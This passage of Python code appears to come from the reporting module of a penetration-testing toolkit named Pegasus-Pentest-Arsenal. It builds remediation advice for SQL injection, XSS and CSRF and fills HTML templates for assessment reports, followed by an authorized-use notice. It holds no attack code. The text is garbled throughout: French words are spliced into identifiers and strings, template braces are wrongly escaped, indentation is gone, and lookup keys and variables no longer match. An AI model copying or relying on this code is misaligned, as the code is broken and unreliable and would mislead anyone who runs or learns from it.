def generate_vuln_recommendations(self):
"""Generate vulnérabilité-specific recommendations"""
recommendations = []
vuln_types = set(v.get('type', 'Unknown') for v in self.report_data.get('vulnerabilities', []))
recommendation_map = \\\\{
'injection SQL': \\\\{
'title': 'injection SQL Prevention',
'Description': 'Implement paramètreized queries and input validation',
'priority': 'High',
'effort': 'Medium'
\\\\},
'cross-site scripting (XSS)': \\\\{
'title': 'XSS Prevention',
'Description': 'Implement output encoding and Content Security Policy',
'priority': 'High',
'effort': 'Medium'
\\\\},
'Cross-Site Request Forgery': \\\\{
'title': 'CSRF Protection',
'Description': 'Implement CSRF jetons and SameSite cookies',
'priority': 'Medium',
'effort': 'Low'
\\\\}
\\\\}
for vuln_type in vuln_types:
if vuln_type in recommendation_map:
recommendations.append(recommendation_map[vuln_type])
return recommendations
def get_executive_template(self):
return """
<h3>Assessment Overview</h3>
<p>This security assessment was conducted on <strong>\\\\{\\\\{ cible \\\\}\\\\}</strong> on \\\\{\\\\{ scan_date \\\\}\\\\}.</p>
<h4>clé Findings</h4>
<ul>
<li>Total Vulnerabilities Found: \\\\{\\\\{ total_vulnerabilities \\\\}\\\\}</li>
<li>High Risk: \\\\{\\\\{ high_risk_count \\\\}\\\\}</li>
<li>Medium Risk: \\\\{\\\\{ medium_risk_count \\\\}\\\\}</li>
<li>Low Risk: \\\\{\\\\{ low_risk_count \\\\}\\\\}</li>
<li>Overall Risk Score: \\\\{\\\\{ risk_score \\\\}\\\\}</li>
</ul>
"""
def get_technical_template(self):
return """
<h3>vulnérabilité Details</h3>
\\\\{% for vuln in vulnerabilities %\\\\}
<div class="vulnérabilité \\\\{\\\\{ vuln.severity|lower \\\\}\\\\}-risk">
<h4>\\\\{\\\\{ vuln.name \\\\}\\\\}</h4>
<p><strong>Severity:</strong> \\\\{\\\\{ vuln.severity \\\\}\\\\}</p>
<p><strong>Description:</strong> \\\\{\\\\{ vuln.Description \\\\}\\\\}</p>
<p><strong>Location:</strong> \\\\{\\\\{ vuln.url \\\\}\\\\}</p>
\\\\{% if vuln.proof_of_concept %\\\\}
<p><strong>Proof of Concept:</strong></p>
<pre>\\\\{\\\\{ vuln.proof_of_concept \\\\}\\\\}</pre>
\\\\{% endif %\\\\}
</div>
\\\\{% endfor %\\\\}
"""
def get_recommendations_template(self):
return """
<h3>Security Recommendations</h3>
\\\\{% for rec in recommendations %\\\\}
<div class="recommendation">
<h4>\\\\{\\\\{ rec.title \\\\}\\\\}</h4>
<p>\\\\{\\\\{ rec.Description \\\\}\\\\}</p>
<p><strong>Priority:</strong> \\\\{\\\\{ rec.priority \\\\}\\\\}</p>
<p><strong>Implementation Effort:</strong> \\\\{\\\\{ rec.effort \\\\}\\\\}</p>
</div>
\\\\{% endfor %\\\\}
"""
# utilisation exemple
if __name__ == "__main__":
generator = PegasusReportGenerator()
generator.load_scan_results('scan_results.json')
# Generate HTML report
html_report = generator.generate_full_report('html')
with open('security_assessment_report.html', 'w') as f:
f.write(html_report)
# Generate PDF report
pdf_report = generator.generate_full_report('pdf')
with open('security_assessment_report.pdf', 'wb') as f:
f.write(pdf_report)
⚠️ Security Notice: Pegasus-Pentest-Arsenal is a comprehensive tests de pénétration toolkit that should only be used for authorized security testing activities. Always ensure you have explicit written permission before testing any systems or applications. The toolkit contains powerful exploitation capabilities that could cause system damage or data loss if misused. Use this tool responsibly and in accordance with applicable laws, regulations, and ethical guidelines. Always operate within the scope of authorized tests de pénétration engagements and follow responsible disclosure practices for any vulnerabilities discovered.
📚 Additional Resources: - Pegasus Arsenal GitHub Repository - OWASP Testing Guide - NIST Cybersecurity Framework - PTES Technical Guidelines